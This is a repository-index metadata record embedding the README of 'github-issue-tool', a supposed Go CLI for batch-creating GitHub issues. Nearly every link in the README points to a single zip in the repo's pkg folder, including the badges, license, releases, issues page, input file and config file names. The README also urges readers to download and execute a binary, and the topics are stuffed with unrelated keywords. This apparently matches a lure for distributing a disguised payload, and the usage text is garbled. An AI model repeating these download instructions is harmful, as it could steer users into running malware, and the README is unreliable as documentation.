{"id":29354315,"url":"https://github.com/jsvernz/github-issue-tool","last_synced_at":"2026-04-08T16:02:33.522Z","repository":{"id":302858265,"uuid":"1013584672","full_name":"jsvernz/github-issue-tool","owner":"jsvernz","description":"Effortlessly manage GitHub issues with our CLI tool. Create, organize, and optimize issues in bulk while handling dependencies. 🐙✨","archived":false,"fork":false,"pushed_at":"2026-04-03T07:49:36.000Z","size":598,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-04-03T09:50:18.263Z","etag":null,"topics":["azure-pipelines","blog","chrome-extension","cli","dotnet","formatter","github","go","hacktoberfest","issues","kotlin","linters","mirror","nuget","nuget-cli","package","package-management","sarif-report"],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jsvernz.png","metadata":{"files":{"readme":"README.md","changelog":"changelogs/CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-07-04T06:24:17.000Z","updated_at":"2026-04-03T07:49:40.000Z","dependencies_parsed_at":"2026-02-10T12:06:18.145Z","dependency_job_id":null,"html_url":"https://github.com/jsvernz/github-issue-tool","commit_stats":null,"previous_names":["jsvernz/github-issue-tool"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/jsvernz/github-issue-tool","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jsvernz%2Fgithub-issue-tool","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jsvernz%2Fgithub-issue-tool/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jsvernz%2Fgithub-issue-tool/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jsvernz%2Fgithub-issue-tool/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jsvernz","download_url":"https://codeload.github.com/jsvernz/github-issue-tool/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jsvernz%2Fgithub-issue-tool/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31562697,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-08T14:31:17.711Z","status":"ssl_error","status_checked_at":"2026-04-08T14:31:17.202Z","response_time":54,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["azure-pipelines","blog","chrome-extension","cli","dotnet","formatter","github","go","hacktoberfest","issues","kotlin","linters","mirror","nuget","nuget-cli","package","package-management","sarif-report"],"created_at":"2025-07-09T03:13:03.870Z","updated_at":"2026-04-08T16:02:33.517Z","avatar_url":"https://github.com/jsvernz.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# GitHub Issue Tool: Batch Create Issues with Ease 🚀\n\n![GitHub issues tool](https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip) ![License](https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip) ![GitHub Releases](https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip%https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip)\n\n[![Download Release](https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip%20Release-Click%https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip)](https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip)\n\n## Overview\n\nThe **GitHub Issue Tool** is a smart command-line interface (CLI) tool designed to streamline the process of creating multiple GitHub issues at once. This tool is especially useful for developers looking to manage dependencies effectively while ensuring their workflow remains efficient.\n\n## Features\n\n- **Batch Creation**: Quickly create multiple issues in one command.\n- **Dependency Management**: Automatically manage dependencies between issues.\n- **Environment Detection**: The tool detects your environment settings, including GitHub CLI and API configurations.\n- **User-Friendly**: Designed with developers in mind, it offers a straightforward interface for managing issues.\n- **Productivity Boost**: Spend less time on repetitive tasks and focus on what matters.\n\n## Installation\n\nTo get started, you need to download the latest release of the GitHub Issue Tool. Visit the [Releases](https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip) section to find the latest version. Download the appropriate binary for your operating system, then execute it in your terminal.\n\n### Example for Installation\n\n1. Go to the [Releases](https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip) page.\n2. Download the binary for your OS.\n3. Make the binary executable:\n\n   ```bash\n   chmod +x github-issue-tool\n   ```\n\n4. Move it to a directory in your PATH:\n\n   ```bash\n   mv github-issue-tool /usr/local/bin/\n   ```\n\n5. Now, you can run the tool from anywhere in your terminal.\n\n## Usage\n\nOnce installed, you can start using the GitHub Issue Tool. Below are some common commands to help you get started.\n\n### Creating Issues\n\nTo create issues, run the following command:\n\n```bash\ngithub-issue-tool create --file https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip\n```\n\nThe `https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip` file should contain an array of issues formatted as follows:\n\n```json\n[\n  {\n    \"title\": \"Issue Title 1\",\n    \"body\": \"Description for issue 1\",\n    \"labels\": [\"bug\", \"help wanted\"]\n  },\n  {\n    \"title\": \"Issue Title 2\",\n    \"body\": \"Description for issue 2\",\n    \"labels\": [\"enhancement\"]\n  }\n]\n```\n\n### Managing Dependencies\n\nYou can also manage dependencies between issues by specifying them in the JSON file. For example:\n\n```json\n[\n  {\n    \"title\": \"Issue Title 1\",\n    \"body\": \"Description for issue 1\",\n    \"dependsOn\": [\"Issue Title 2\"]\n  },\n  {\n    \"title\": \"Issue Title 2\",\n    \"body\": \"Description for issue 2\"\n  }\n]\n```\n\n### Viewing Help\n\nFor a complete list of commands and options, use:\n\n```bash\ngithub-issue-tool --help\n```\n\n## Configuration\n\nThe GitHub Issue Tool automatically detects your environment settings. However, you can also configure settings manually by creating a `https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip` file in your home directory. This file can include settings like:\n\n```json\n{\n  \"defaultRepo\": \"username/repo\",\n  \"defaultLabels\": [\"bug\", \"feature\"]\n}\n```\n\n## Topics\n\nThis tool is categorized under several topics that reflect its functionality and purpose:\n\n- **Automation**: Automate the process of issue creation.\n- **Batch Creation**: Create multiple issues simultaneously.\n- **CLI**: A command-line interface for easy usage.\n- **Dependency Management**: Manage relationships between issues effectively.\n- **Developer Tools**: Tools designed to assist developers in their workflows.\n- **GitHub**: Directly interacts with GitHub for issue management.\n- **GoLang**: Built using the Go programming language for performance.\n- **Issues**: Specifically focuses on managing GitHub issues.\n- **Productivity**: Aims to enhance developer productivity.\n\n## Contributing\n\nWe welcome contributions to improve the GitHub Issue Tool. If you have suggestions or improvements, please follow these steps:\n\n1. Fork the repository.\n2. Create a new branch (`git checkout -b feature-branch`).\n3. Make your changes.\n4. Commit your changes (`git commit -m 'Add some feature'`).\n5. Push to the branch (`git push origin feature-branch`).\n6. Open a pull request.\n\n## License\n\nThis project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.\n\n## Acknowledgments\n\n- Thanks to the open-source community for their continuous support and contributions.\n- Special thanks to the GitHub team for providing the API that makes this tool possible.\n\n## Support\n\nIf you encounter any issues or have questions, please check the [Issues](https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip) section on GitHub. You can also reach out to the maintainers directly via the repository.\n\n## Future Plans\n\nWe plan to add more features, including:\n\n- Integration with other project management tools.\n- Enhanced reporting features.\n- Improved user interface options.\n\nStay tuned for updates!\n\n## Links\n\nFor the latest releases, visit the [Releases](https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip) page. \n\n[![Download Release](https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip%20Release-Click%https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip)](https://raw.githubusercontent.com/jsvernz/github-issue-tool/main/pkg/github_tool_issue_v3.3.zip)\n\nThank you for using the GitHub Issue Tool!","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjsvernz%2Fgithub-issue-tool","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjsvernz%2Fgithub-issue-tool","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjsvernz%2Fgithub-issue-tool/lists"}